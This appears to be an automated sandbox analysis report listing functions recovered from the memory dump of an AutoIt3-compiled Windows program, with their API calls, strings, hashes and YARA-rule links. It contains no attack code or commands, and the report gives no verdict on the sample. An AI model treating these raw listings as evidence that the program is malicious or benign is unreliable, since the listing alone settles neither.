Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 84c287e5594554ca0b8a8a230526b557bca4cf4e6cf536ce48a212eb7d67202d
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 76018C3204818ABBCF165E84CC018EE3F32BF29354F198625FA2C58072C737C9B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 001CB57F, Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 001CB59E
ScreenToClient.USER32 ref: 001CB5B6
ScreenToClient.USER32 ref: 001CB5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 001CB5F5

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: e5e7e6cd4444e758eecf4c6f760de259094d45304226eeb9e56689fd71f1fd5e
Instruction ID: c0976b8246f4cedd9883c6136b0540c96ea3c69aac1d1e4c2270e0748ebb71a7
Opcode Fuzzy Hash: e5e7e6cd4444e758eecf4c6f760de259094d45304226eeb9e56689fd71f1fd5e
Instruction Fuzzy Hash: 011146B5D04209EFDB41CF99C484AEEFBB5FB18310F104166E954E3620D735AA558F50

Uniqueness

Uniqueness Score: -1.00%

Function 001A6E7C, Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 001A6E88

Part of subcall function 001A794E: _memset.LIBCMT ref: 001A7983

_memmove.LIBCMT ref: 001A6EAB
_memset.LIBCMT ref: 001A6EB8
LeaveCriticalSection.KERNEL32(?), ref: 001A6EC8

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: ae73299e634b3e10eb727bb5f3bd0b428a9cfa462479b73877368b0c178168a3
Instruction ID: d81665356cbae84dc4da4f60b8af3d995e7a2c87885eaff1271ba58f3b479f2e
Opcode Fuzzy Hash: ae73299e634b3e10eb727bb5f3bd0b428a9cfa462479b73877368b0c178168a3
Instruction Fuzzy Hash: FEF0543A104200BBCF016F55DC85E4ABB2AEF55320B04C065FE089E227C731E951CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 001CC00C, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 001412F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0014134D
Part of subcall function 001412F3: SelectObject.GDI32(?,00000000), ref: 0014135C
Part of subcall function 001412F3: BeginPath.GDI32(?), ref: 00141373
Part of subcall function 001412F3: SelectObject.GDI32(?,00000000), ref: 0014139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 001CC030
LineTo.GDI32(00000000,?,?), ref: 001CC03D
EndPath.GDI32(00000000), ref: 001CC04D
StrokePath.GDI32(00000000), ref: 001CC05B

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: cf11bd033101db6673ed61e53c4fe89e19854c2f1426b4d243540fe9ebbc191e
Instruction ID: 225b9e8169c6bc161e26d2bfc7e725b007ba7e8ce16bf41bdd395d89769c2a7d
Opcode Fuzzy Hash: cf11bd033101db6673ed61e53c4fe89e19854c2f1426b4d243540fe9ebbc191e
Instruction Fuzzy Hash: 38F0BE31000219BBDB122F50AC0EFCE3F5AAF15710F148008FA11610E287B589B6CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 0019A37C, Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32 ref: 0019A399
GetWindowThreadProcessId.USER32(?,00000000), ref: 0019A3AC
GetCurrentThreadId.KERNEL32 ref: 0019A3B3
AttachThreadInput.USER32(00000000), ref: 0019A3BA

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 3b2d1775168876822f0271e0c278cc99d4d83f7200b439a53986e167ac191a48
Instruction ID: d2c9a2391ddb3fc4e17445e1e1db8664236bd637bda6e879eee4a4189d7a1ffe
Opcode Fuzzy Hash: 3b2d1775168876822f0271e0c278cc99d4d83f7200b439a53986e167ac191a48
Instruction Fuzzy Hash: 44E03931541238BADB201BA2DC0CED73F1DFF167A1F408029F90884460C771C685CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00142218, Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00142231
SetTextColor.GDI32(?,000000FF), ref: 0014223B
SetBkMode.GDI32(?,00000001), ref: 00142250
GetStockObject.GDI32(00000005), ref: 00142258
GetWindowDC.USER32(?,00000000), ref: 0017C0D3
GetPixel.GDI32(00000000,00000000,00000000), ref: 0017C0E0
GetPixel.GDI32(00000000,?,00000000), ref: 0017C0F9
GetPixel.GDI32(00000000,00000000,?), ref: 0017C112
GetPixel.GDI32(00000000,?,?), ref: 0017C132
ReleaseDC.USER32 ref: 0017C13D

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 3628e08e7bcc58756348909637fce5c31e05af69b193982a8827e86b0ad9c269
Instruction ID: 3e62412fe26c889f46ed8e4870d15fc4073efe8675b634575e5279fd521da695
Opcode Fuzzy Hash: 3628e08e7bcc58756348909637fce5c31e05af69b193982a8827e86b0ad9c269
Instruction Fuzzy Hash: 5AE03932100244EEDB215FA4FC09BD83F21EB15332F18836AFA69480E187B189C1DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00198C5A, Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00198C63
OpenThreadToken.ADVAPI32(00000000,?,?,?,0019882E), ref: 00198C6A
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0019882E), ref: 00198C77
OpenProcessToken.ADVAPI32(00000000,?,?,?,0019882E), ref: 00198C7E

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: dee49ed94c64ba7198067797cfbae437e7322e1b37984858ee170e4a76a57e1b
Instruction ID: bea9b3a36853aeb0d516b89c6534347fe2e1806940c97c74af90c18d1b0a0209
Opcode Fuzzy Hash: dee49ed94c64ba7198067797cfbae437e7322e1b37984858ee170e4a76a57e1b
Instruction Fuzzy Hash: 9BE04F76642211ABDB205FB06D0CF973FAAEF51BA2F04482CB645C9040DA34C486CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00182187, Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00182187
GetDC.USER32(00000000), ref: 00182191
GetDeviceCaps.GDI32(00000000,0000000C), ref: 001821B1
ReleaseDC.USER32 ref: 001821D2

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 53d9959eb7cd7fbfd9c4ade649ababea40dc85831473063c85b868430209aa5a
Instruction ID: 268ef2e5ca5472994a51a16e0cdf5a441ec31039e628173bc38ab20075dd90c5
Opcode Fuzzy Hash: 53d9959eb7cd7fbfd9c4ade649ababea40dc85831473063c85b868430209aa5a
Instruction Fuzzy Hash: 95E01AB5800224EFDB019F60C808A9D7FF2EB5C351F218429F95A97760CB3891829F40

Uniqueness

Uniqueness Score: -1.00%

Function 0018219B, Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0018219B
GetDC.USER32(00000000), ref: 001821A5
GetDeviceCaps.GDI32(00000000,0000000C), ref: 001821B1
ReleaseDC.USER32 ref: 001821D2

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 57fe650e4d749d1dad94463344d1606b9408ac31ec26c571171e8f60d5dd2d17
Instruction ID: 1f5648408e185b2f1c2a57105c0c2ad98bcef88fdd22bdf42502f0aab912d619
Opcode Fuzzy Hash: 57fe650e4d749d1dad94463344d1606b9408ac31ec26c571171e8f60d5dd2d17
Instruction Fuzzy Hash: 03E09AB5800214AFCB519F70D808A9D7FF6EB5C351F118429F95A97760DB7895829F40

Uniqueness

Uniqueness Score: -1.00%

Function 001BB1B7, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 001BB2C3

Strings

xr , xrefs: 001BB2F9
xr , xrefs: 001BB325

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: __itow_s
String ID: xr $xr
API String ID: 3653519197-2518022337
Opcode ID: 19ebd0dbdd9cfa660e57dc4de741a7e3cb7529805dd9fe74973bc7e9861060cc
Instruction ID: defb884bec3e95cb33581d19a4308c41b000c5daa2d7f39b282be295a827d959
Opcode Fuzzy Hash: 19ebd0dbdd9cfa660e57dc4de741a7e3cb7529805dd9fe74973bc7e9861060cc
Instruction Fuzzy Hash: E4B17170A04209AFDB24DF54C8D1EEEB7B9FF58300F148499F9459B692DBB0E941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0019B7B6, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0019B981

Strings

AutoIt3GUI, xrefs: 0019B8F9
Container, xrefs: 0019B8FE

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: f96943928484bc398573be46849b3e616f580636cfd291eeb2d2750336dca4cb
Instruction ID: fb38382667cbadba678c02aa3b1e2825b70fa5ebcd20a290312780af08ddccb3
Opcode Fuzzy Hash: f96943928484bc398573be46849b3e616f580636cfd291eeb2d2750336dca4cb
Instruction Fuzzy Hash: 51915B70604601AFDB24DF68D984B6ABBF9FF48710F14856EF94ACB691DB70E841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001AB217, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 0015FEC6: _wcscpy.LIBCMT ref: 0015FEE9

Part of subcall function 00149997: __itow.LIBCMT ref: 001499C2
Part of subcall function 00149997: __swprintf.LIBCMT ref: 00149A0C

__wcsnicmp.LIBCMT ref: 001AB298
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 001AB361

Strings

LPT, xrefs: 001AB292

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 65c871ce070e856c3ac85b3c8efa7d74a8d3d2491ec5008a39a4acf93394c2ee
Instruction ID: 39dcdfa2622a8e1c0c61edd516ee80567021f9185fb32616f6309e97fddac242
Opcode Fuzzy Hash: 65c871ce070e856c3ac85b3c8efa7d74a8d3d2491ec5008a39a4acf93394c2ee
Instruction Fuzzy Hash: FD617F79A04255AFCF18DF94C881EAEB7B4FF19310F11446AF946AB292DB70AE44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00152AB7, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00152AC8
GlobalMemoryStatusEx.KERNEL32(?), ref: 00152AE1

Strings

@, xrefs: 00152AD5

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 86a1ac08a3c180834c1db7d6832e25448cfe274e137bf685dc1e354fef0e281d
Instruction ID: 0b847720c5366cc3827d08e20bbb5e724aae11fd5538ed7a09fc701ab5912222
Opcode Fuzzy Hash: 86a1ac08a3c180834c1db7d6832e25448cfe274e137bf685dc1e354fef0e281d
Instruction Fuzzy Hash: F55144724187449BD320AF50DC86BAFBBE8FF94310F92885DF1D9421A2DB318569CB26

Uniqueness

Uniqueness Score: -1.00%

Function 0018099E, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 001809A9

Strings

Dt , xrefs: 0014A477
Dt , xrefs: 0014A2B1

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ClearVariant
String ID: Dt $Dt
API String ID: 1473721057-1420062600
Opcode ID: 812c2821ca3f9b8be4d43fdb6c74841d74b8342f42c729c742701b4fae51794b
Instruction ID: 40226c619cc5fb4027ba8c94854bd9b0ced3672f88ef7c680ede60edeb1cd318
Opcode Fuzzy Hash: 812c2821ca3f9b8be4d43fdb6c74841d74b8342f42c729c742701b4fae51794b
Instruction Fuzzy Hash: 5B51D3B8A483428FD754CF18C484A2ABBF1BF99354F95485DF9858B361E331E885CF82

Uniqueness

Uniqueness Score: -1.00%

Function 001B2882, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001B2892
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 001B28C8

Strings

|, xrefs: 001B2899

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: f9506da4ef2a092126e5958a953d9475a45c403e0130c6238535d12ac1a997f8
Instruction ID: 5d9db2f7b6b09ba33e6004d08b29674ae5fbc4a0fb1453ed4814bfb0e0d04dd7
Opcode Fuzzy Hash: f9506da4ef2a092126e5958a953d9475a45c403e0130c6238535d12ac1a997f8
Instruction Fuzzy Hash: 12312D71800119AFCF01EFA1CC85EEEBFB9FF18350F104069F815A6166EB715A56DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C6CD2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 001C6D86
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 001C6DC2

Strings

static, xrefs: 001C6D22

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 4596e078bba1b00d9144d27aaf068ef74ad856893f1768b8ffe633bda69ba56b
Instruction ID: d8ce6b64b0c28a120ba3c927b672dab73b26662f6bb28b3df0f25bfce1bd3e62
Opcode Fuzzy Hash: 4596e078bba1b00d9144d27aaf068ef74ad856893f1768b8ffe633bda69ba56b
Instruction Fuzzy Hash: 3A316B71200604AADB109F68CC85FFB77A9FF58724F10861DF9AA97190DB31EC92CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001A2D91, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001A2E00
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001A2E3B

Strings

0, xrefs: 001A2DF9

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: a46c1ff5934524b36bc1c182df7ad16338362b27336a6f8fc7b9d9520b586a51
Instruction ID: 493367786d535b52f30db0e474f999d77809a50166800f8c9e8ae957b64f16e4
Opcode Fuzzy Hash: a46c1ff5934524b36bc1c182df7ad16338362b27336a6f8fc7b9d9520b586a51
Instruction Fuzzy Hash: BA310435A00309ABEB258F5CC885BAEBBB9FF06300F14402EE985D62A1E7709984CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001C6943, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 001C69D0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001C69DB

Strings

Combobox, xrefs: 001C699D

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: c5c8df49f86241b662120648be9c0b296f3612909322680a692355ef94f317c1
Instruction ID: f55a936873d329ad52ddbdc00ced597153d51bc42fcf95ac1ff16643cdb9702c
Opcode Fuzzy Hash: c5c8df49f86241b662120648be9c0b296f3612909322680a692355ef94f317c1
Instruction Fuzzy Hash: 7211B2716002096FEF119E14CC81FBB376AEBA93A8F110228F958972A0D775DC9187A0

Uniqueness

Uniqueness Score: -1.00%

Function 001C6E76, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00141D35: CreateWindowExW.USER32 ref: 00141D73
Part of subcall function 00141D35: GetStockObject.GDI32(00000011), ref: 00141D87
Part of subcall function 00141D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00141D91

GetWindowRect.USER32 ref: 001C6EE0
GetSysColor.USER32(00000012), ref: 001C6EFA

Strings

static, xrefs: 001C6EBD

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 11e80aa8015b5f2cd5e654d4c68441fd4e24447244980a83b7b1e165112a8315
Instruction ID: 7c226efef5f43456573955c508d003b40ab0c9f2bea942543d55cb62fa5bd07c
Opcode Fuzzy Hash: 11e80aa8015b5f2cd5e654d4c68441fd4e24447244980a83b7b1e165112a8315
Instruction Fuzzy Hash: 93212672A1020AAFDB04DFA8DD46EEA7BB9FB18314F00462DF955D3250E734E8619B60

Uniqueness

Uniqueness Score: -1.00%

Function 001C6B8F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 001C6C11
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001C6C20

Strings

edit, xrefs: 001C6BF5

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 341f2b741c0f1c4734b65a5f65ac72b6957c1d9e9322d03c645fa60b3ef3e71f
Instruction ID: 89fd38be972bc83dfd83535c729a9a7b693864667ba566c2f48ee8c887a61f31
Opcode Fuzzy Hash: 341f2b741c0f1c4734b65a5f65ac72b6957c1d9e9322d03c645fa60b3ef3e71f
Instruction Fuzzy Hash: E4118C71600208ABEB108E64DC85FEB3B6AEB24378F204728F965D71E0C775DC919B60

Uniqueness

Uniqueness Score: -1.00%

Function 001A2E9E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001A2F11
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 001A2F30

Strings

0, xrefs: 001A2F07

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 8906e64f4224b7780b947da04755a3bae99461504569ca5bd98b5fa80124b365
Instruction ID: 7ae2209e372fed39e215792a6cdeae8baa941339960bae38e68e7864c9f4579b
Opcode Fuzzy Hash: 8906e64f4224b7780b947da04755a3bae99461504569ca5bd98b5fa80124b365
Instruction Fuzzy Hash: CB11BF79A01214AFDB24EB5CDC48BA977B9EB16310F1940A5EC54A72A2D7B0EE04C791

Uniqueness

Uniqueness Score: -1.00%

